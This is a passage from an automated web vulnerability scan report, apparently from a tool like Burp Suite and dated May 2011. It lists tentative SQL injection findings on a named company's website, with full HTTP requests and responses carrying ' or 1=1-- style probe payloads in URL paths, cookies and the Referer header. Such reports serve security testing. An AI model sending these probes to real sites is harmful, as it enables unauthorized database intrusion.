else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/Advertiser_Agreement35525155'%20or%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:23 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=e7b89d9d22ee322e26c928d489ab60ae; expires=Sun, 08 May 2011 19:37:23 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:23 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html
Set-Cookie: TSa27990=17226455681a23b43340e174788d7a47cf55f197b0915ed34dc443f49c5eca853e60e59c; Path=/


2.31. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [s_sq cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Advertiser_Agreement

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. The payloads 64212002'%20or%201%3d1--%20 and 64212002'%20or%201%3d2--%20 were each submitted in the s_sq cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Advertiser_Agreement HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D64212002'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:57 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=dba9e76780dab5082f6ad3b40d81f7c9; expires=Sun, 08 May 2011 19:35:57 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:57 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=a6085532e0617f3f26069bb7f806dc6988fcd6e4d06ed9974dc443569c5eca85b77317fc; Path=/
Content-Length: 34603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Advertising User Agreement</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Advertising User Agreement">
   <meta name="keywords" content="Advertising User Agreement">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function,
...[SNIP]...

Request 2

GET /main/do/Advertiser_Agreement HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D64212002'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:57 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=6fbc3a6086880dcc38961944854f905d; expires=Sun, 08 May 2011 19:35:57 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:57 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 34603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Advertising User Agreement</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Advertising User Agreement">
   <meta name="keywords" content="Advertising User Agreement">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. -->
<script type="text/javascript
...[SNIP]...

2.32. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 72254876'%20or%201%3d1--%20 and 72254876'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Careers72254876'%20or%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:43 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=ad448786cf2b76ce54480dea55d64ae9; expires=Sun, 08 May 2011 19:36:43 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:43 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/Careers72254876'%20or%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:43 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=7498864a68df42f076f73d37ca5f499f; expires=Sun, 08 May 2011 19:36:43 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:43 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html


2.33. http://www.dominionenterprises.com/main/do/Careers [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 12491798'%20or%201%3d1--%20 and 12491798'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=12491798'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:29 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=50020d3c5d5f588a1b914a2e77bc27a7; expires=Sun, 08 May 2011 19:35:29 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:29 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=46792d7b37bb084f60dc2f6e1f256825516b4aa4839835dd4dc443829c5eca85df506b6d; Path=/
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o
...[SNIP]...

Request 2

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=12491798'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:29 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=f73a685d8d2810e0713139115067fb17; expires=Sun, 08 May 2011 19:35:29 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:29 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/js
...[SNIP]...

2.34. http://www.dominionenterprises.com/main/do/Careers [s_cc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. The payloads 62583083'%20or%201%3d1--%20 and 62583083'%20or%201%3d2--%20 were each submitted in the s_cc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true62583083'%20or%201%3d1--%20; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:07 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=e2553f7484cb2c7783f3a5c243d53604; expires=Sun, 08 May 2011 19:35:07 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:07 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=1e404d829976e6f2f6bbfbc4ca9a68ff17a0fb93ea548b494dc443259c5eca85caf3474a; Path=/
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines o
...[SNIP]...

Request 2

GET /main/do/Careers HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true62583083'%20or%201%3d2--%20; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:07 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=ecde5f56d9a309efc466b068f1ee9147; expires=Sun, 08 May 2011 19:35:07 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:07 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 19076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Careers</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Careers">
   <meta name="keywords" content="Careers">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/js
...[SNIP]...

2.35. http://www.dominionenterprises.com/main/do/For_Businesses [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/For_Businesses

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16640137'%20or%201%3d1--%20 and 16640137'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/For_Businesses16640137'%20or%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/Advertiser_Agreement
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725152629:ss=1304725152629; s_nr=1304725175943; s_lv=1304725175944; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:58 GMT
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:58 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/For_Businesses16640137'%20or%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/Advertiser_Agreement
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725152629:ss=1304725152629; s_nr=1304725175943; s_lv=1304725175944; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:58 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:58 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html


2.36. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/businesses/id/13/category/For%20Businesses

Issue detail

